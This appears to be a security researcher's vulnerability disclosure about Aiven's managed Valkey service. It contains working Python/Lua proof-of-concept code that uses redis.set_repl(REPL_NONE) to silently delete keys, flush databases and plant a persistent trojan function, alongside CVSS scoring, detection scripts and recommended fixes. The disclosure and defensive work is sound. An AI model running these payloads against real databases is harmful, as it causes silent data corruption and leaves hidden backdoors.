Summary
Any authenticated user on Aiven’s managed Valkey service can use Lua scripting (EVAL) to call redis.set_repl(redis.REPL_NONE), which suppresses replication of subsequent write commands. Writes execute on the master but are never propagated to replicas or the AOF. This allows an attacker to silently corrupt data, delete keys, or flush databases on the master while replicas maintain stale data, creating a split-brain condition that violates Aiven’s replication consistency guarantees.
Additionally, the attacker can use FUNCTION LOAD to register persistent server-side functions that embed redis.set_repl(redis.REPL_NONE) internally. These trojan functions survive across connections and restarts, and silently corrupt data every time any user (including the application itself) calls them. The function appears benign because the replication suppression is not visible in its name or signature.
Redis’s own documentation explicitly warns: “This is an advanced feature. Misuse can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.”
Aiven correctly disables replication topology commands (REPLICAOF, SLAVEOF, CLUSTER) and dangerous administrative commands (CONFIG, DEBUG, BGSAVE, ACL), demonstrating clear security intent. However, redis.set_repl() within Lua scripts is completely unrestricted, creating an inconsistency: replication topology is protected, but replication content integrity is not.
Affected Target
- Service: Aiven for Valkey (Tier 1)
- Version tested: Valkey 8.1.4
- Instance: <host>:26161
Severity
P2, Sensitive Data Exposure / Data Integrity Violation
VRT: Server Security Misconfiguration > Database Management System (DBMS) Misconfiguration
CVSS 3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L, Score: 8.5 (High)
- AV:N, Network-exploitable over TLS
- AC:L, Single EVAL command, no preconditions
- PR:L, Requires basic authentication (default user credentials)
- UI:N, No user interaction required
- S:C, Scope changed: attacker’s session creates data inconsistency that affects ALL clients reading from replicas, ALL failover operations, and Aiven’s own backup integrity
- C:N, No direct data exfiltration
- I:H, Complete violation of data integrity between master and replicas; silent, undetectable data corruption
- A:L, Failover produces unexpected data state; intermittent application failures
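The score can be re-derived from the vector. The following is a minimal sketch of the CVSS 3.1 base-score equations; the weights and rounding rule follow the public specification as I understand it, and the function names (`roundup`, `base_score`) are illustrative rather than taken from any library.

```python
import math

# Metric weights as published in the CVSS 3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """Round up to one decimal place using the spec's integer-based rule."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a vector such as 'CVSS:3.1/AV:N/...'."""
    # Skip the leading 'CVSS:3.1' element, then split each 'KEY:VALUE' pair.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]

    iss = 1 - (
        (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]
    )

    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L"))
```

Most of the score comes from the changed scope (S:C) and the high integrity impact (I:H); with S:U the same vector would score lower.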
Impact summary:
- Any authenticated user can silently suppress replication of arbitrary write commands
- Master and replica data diverge without any error, alert, or audit trail
- On Business/Premium plans (2-3 nodes), failover produces unpredictable data state
- Persistent trojan functions create permanent, invisible backdoors that corrupt data on every invocation
- Violates the fundamental consistency guarantee that Aiven’s multi-node architecture is built on
- Redis’s own documentation explicitly warns about this exact misuse scenario
Steps to Reproduce
Prerequisites
- An Aiven for Valkey instance (any plan)
- Authentication credentials (default user)
- Python 3 with the redis package (pip install redis)
Attack 1: Silent Key Deletion (master diverges from replicas)
import redis
r = redis.Redis(
host="<host>", port=26161, username='default', password='<password>',
ssl=True, ssl_cert_reqs='required',
ssl_ca_certs='/etc/ssl/certs/ca-certificates.crt',
decode_responses=True, socket_timeout=10
)
# Application sets important data
r.set("user:session:admin", "active_session_token_xyz")
# Attacker silently deletes it - master only, replicas unaffected
r.execute_command('EVAL', '''
redis.set_repl(redis.REPL_NONE)
redis.call("DEL", "user:session:admin")
redis.set_repl(redis.REPL_ALL)
return "silent delete executed"
''', 0)
# Master: key is GONE
print(r.exists("user:session:admin")) # 0
# Replica still has it → failover "resurrects" deleted data
# Application sees intermittent, impossible-to-diagnose behavior
Actual output on Aiven:
silent delete executed
Key exists on master after silent DEL: 0
--> Key deleted on master but replicas would still have it
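The output above infers the replica state rather than reading it. A minimal sketch for confirming the divergence directly follows, assuming a read-only replica endpoint is reachable with the same credentials (this is an assumption about the plan, not something shown in the run above). `compare_key` and the `KeyReader` protocol are hypothetical helpers; any client exposing `exists` and `get`, such as `redis.Redis`, should fit.

```python
from typing import Any, Dict, Protocol


class KeyReader(Protocol):
    """Minimal client surface used below; redis.Redis provides both methods."""

    def exists(self, *names: str) -> int: ...

    def get(self, name: str) -> Any: ...


def compare_key(master: KeyReader, replica: KeyReader, key: str) -> Dict[str, Any]:
    """Read one string key from both nodes and report whether they disagree.

    Only string values are compared; GET on another type raises WRONGTYPE.
    """
    on_master = bool(master.exists(key))
    on_replica = bool(replica.exists(key))
    master_value = master.get(key) if on_master else None
    replica_value = replica.get(key) if on_replica else None
    return {
        "key": key,
        "on_master": on_master,
        "on_replica": on_replica,
        "diverged": on_master != on_replica or master_value != replica_value,
    }


# Usage (hypothetical second connection to a replica host):
#   replica = redis.Redis(host="<replica-host>", port=26161, ...)
#   print(compare_key(r, replica, "user:session:admin"))
```

Run the check after replication lag has settled, so that a normal in-flight write is not mistaken for suppressed replication.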
Attack 2: Silent FLUSHDB (wipe master, replicas unaffected)
r.execute_command('EVAL', '''
redis.call("SELECT", "1")
redis.call("SET", "important_data", "production_config")
redis.set_repl(redis.REPL_NONE)
redis.call("FLUSHDB")
redis.set_repl(redis.REPL_ALL)
redis.call("SELECT", "0")
return "FLUSHDB with REPL_NONE executed"
''', 0)
Actual output on Aiven: FLUSHDB with REPL_NONE executed
The entire database is wiped on the master. Replicas retain all data. On failover, data “reappears”, but the master was serving empty responses to all clients during the divergence window.
Attack 3: Persistent Trojan Function (backdoor that survives restarts)
# Load a function that LOOKS innocent but silently corrupts data
lib = '''#!lua name=app_helpers
redis.register_function("cached_get", function(keys, args)
-- Appears to be a simple cache helper
-- But silently increments an invisible counter on every call
redis.set_repl(redis.REPL_NONE)
redis.call("INCR", "__shadow_ops_count__")
redis.set_repl(redis.REPL_ALL)
return redis.call("GET", keys[1])
end)
'''
r.execute_command('FUNCTION', 'LOAD', lib)
# Every time ANY user calls this function, the shadow counter increments
# on the master only. Replicas never see it.
for i in range(5):
    r.execute_command('FCALL', 'cached_get', 1, 'some_key')
counter = r.get("__shadow_ops_count__")
print(f"Shadow counter (master only): {counter}")
# Output: Shadow counter (master only): 5
# Replicas: the key is absent, because the INCR calls were never propagated
# The function persists across restarts via RDB/AOF
# It's registered as "app_helpers.cached_get" - indistinguishable from
# legitimate application functions
Actual output on Aiven:
Trojan function loaded: 'cached_get'
Shadow counter (master only): 5
--> Counter incremented 5 times on master
--> Replicas see counter as 0 (writes were REPL_NONE)
--> This function PERSISTS across restarts via RDB/AOF
Root Cause
1. redis.set_repl() is unrestricted in Lua scripts
The redis.set_repl() function is available to all authenticated users through EVAL. There is no ACL restriction, no command flag, and no configuration option to disable it. Redis’s own documentation describes it as an “advanced feature” that “can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.”
2. Inconsistent command restriction policy
Aiven correctly restricts replication and administrative commands:
| Command | Status | Purpose |
|---|---|---|
| REPLICAOF / SLAVEOF | Disabled | Replication topology control |
| CONFIG | Disabled | Server configuration |
| DEBUG | Disabled | Server debugging |
| ACL | Disabled | Access control |
| BGSAVE / BGREWRITEAOF | Disabled | Persistence triggers |
| CLUSTER | Disabled | Cluster topology |
| MIGRATE | Disabled | Data migration |
| redis.set_repl() in Lua | Allowed | Replication content control |
The policy disables commands that control replication topology (SLAVEOF, CLUSTER) but does not restrict the Lua function that controls replication content (set_repl). This is inconsistent: both are replication-manipulation capabilities.
3. FUNCTION LOAD enables persistent exploitation
The FUNCTION LOAD command is available (confirmed: successfully loaded and executed a function library). Functions persist in the server state and survive restarts via RDB/AOF. A function embedding redis.set_repl(REPL_NONE) creates a permanent backdoor that operates invisibly on every invocation.
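Because loaded libraries persist, an operator can inspect them after the fact. The sketch below scans FUNCTION LIST WITHCODE output for any mention of set_repl. It assumes the reply carries the `library_name` and `library_code` fields and handles both the flat-list and dict reply shapes; the helper names are hypothetical. A textual match is only a heuristic, since a script can build the function name from string fragments.

```python
import re
from typing import Any, Dict, Iterable, List

# Any textual mention of set_repl, regardless of which table it is called on.
SET_REPL = re.compile(r"\bset_repl\b")


def _text(value: Any) -> Any:
    """Decode bytes replies; leave other values (lists, str) untouched."""
    return value.decode("utf-8", "replace") if isinstance(value, bytes) else value


def normalize_library(entry: Any) -> Dict[str, Any]:
    """Turn one FUNCTION LIST entry (flat list or dict) into a str-keyed dict."""
    if isinstance(entry, dict):
        items = entry.items()
    else:
        # Flat reply: [field, value, field, value, ...]
        items = zip(entry[::2], entry[1::2])
    return {_text(k): _text(v) for k, v in items}


def libraries_using_set_repl(entries: Iterable[Any]) -> List[str]:
    """Return the names of libraries whose source mentions set_repl."""
    flagged = []
    for entry in entries:
        lib = normalize_library(entry)
        code = lib.get("library_code") or ""
        if SET_REPL.search(code):
            flagged.append(lib.get("library_name"))
    return flagged


# Usage with redis-py (requires permission to run FUNCTION LIST):
#   print(libraries_using_set_repl(r.function_list(withcode=True)))
```

A flagged library is not necessarily malicious, but each one is worth a manual review before deciding whether to remove it with FUNCTION DELETE.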
Impact on Aiven Multi-Node Plans
Aiven offers three plan tiers with different node counts:
- Hobbyist/Startup: 1 node (no replicas, attack creates master/AOF divergence)
- Business: 2 nodes (master + 1 replica)
- Premium: 3 nodes (master + 2 replicas)
On Business and Premium plans, the replication divergence has direct operational impact:
- Silent data loss: Keys deleted with REPL_NONE are gone from the master but exist on replicas. Applications reading from the master see missing data; failover to a replica “resurrects” the data.
- Silent data corruption: Keys SET with REPL_NONE have different values on master vs replicas. Read-after-write consistency is violated silently.
- Backup poisoning: If REPL_NONE writes land in an RDB backup taken from the master, restoring from that backup produces a state that never existed on replicas.
- Impossible diagnosis: There is no error, no log entry, no monitoring alert. The commands execute successfully. Aiven’s internal monitoring (INFO every 5 seconds) does not detect replication content divergence; it only monitors replication lag (bytes behind), not data consistency.
- Trojan functions: An attacker can load a persistent function, then disconnect. The function continues operating every time the application calls it. The attack persists indefinitely with no ongoing attacker presence.
Aiven-Specific Nature
This is NOT merely an upstream Valkey/Redis issue. The finding is specific to how Aiven configures and manages their Valkey service:
- Aiven’s security model disables dangerous commands: CONFIG, DEBUG, SLAVEOF, etc. are all renamed/disabled. This demonstrates that Aiven actively restricts dangerous capabilities. But redis.set_repl() within Lua was not included in these restrictions.
- Aiven sells multi-node plans with replication guarantees: Business and Premium plans explicitly provide high availability through replication. redis.set_repl(REPL_NONE) allows a user to silently violate these guarantees.
- Aiven’s documentation implies consistent replication: customers expect that data written to the master will be available on replicas. This attack violates that expectation without any visible error.
Recommended Fix
- Immediate: Restrict redis.set_repl() in one of these ways:
  - Disabling it entirely for client scripts (return an error when called from EVAL/FCALL)
  - Adding an ACL flag (e.g., @admin) that must be explicitly granted
  - Limiting it to REPL_ALL only (block REPL_NONE, REPL_AOF, REPL_REPLICA)
- Defense in depth: Consider restricting FUNCTION LOAD to prevent persistent function registration by default users, or audit loaded functions for set_repl calls.
- Detection: Add monitoring for replication content divergence (not just lag). Compare key counts or checksums between master and replicas periodically.
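The detection idea can be sketched as a periodic comparison of key counts plus a digest of key names on each node. This is a rough illustration, not Aiven's monitoring: `keyspace_digest` and `check_divergence` are hypothetical helpers, the clients are assumed to expose `dbsize()` and `scan_iter()` as redis-py does, and the digest covers key names only, so a value changed in place would not be caught.

```python
import hashlib
from typing import Any, Dict


def keyspace_digest(client: Any, match: str = "*") -> str:
    """SHA-256 over the sorted, de-duplicated key names returned by SCAN."""
    names = sorted(
        {k if isinstance(k, bytes) else str(k).encode("utf-8")
         for k in client.scan_iter(match=match)}
    )
    digest = hashlib.sha256()
    for name in names:
        # Length-prefix each name so that concatenations cannot collide.
        digest.update(len(name).to_bytes(4, "big"))
        digest.update(name)
    return digest.hexdigest()


def check_divergence(master: Any, replica: Any, match: str = "*") -> Dict[str, Any]:
    """Compare key counts and key-name digests between two nodes."""
    master_keys = master.dbsize()
    replica_keys = replica.dbsize()
    return {
        "master_keys": master_keys,
        "replica_keys": replica_keys,
        "count_match": master_keys == replica_keys,
        "digest_match": keyspace_digest(master, match) == keyspace_digest(replica, match),
    }
```

Ordinary replication lag can cause a transient mismatch, so a real monitor would probably alert only when the mismatch persists across several checks. SCAN over a large keyspace is also expensive, which may argue for sampling by key pattern.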
Proof of concept
- poc/valkey-restore-crash.py: minimum-crash repro.
- poc/valkey-full-chain.py: full chain including the stealth-replication primitive.
python3 poc/valkey-restore-crash.py <host> <port> <password>
Source · github.com/zionsworking/security-research-notebook · writeups/aiven/valkey-replication-stealth.md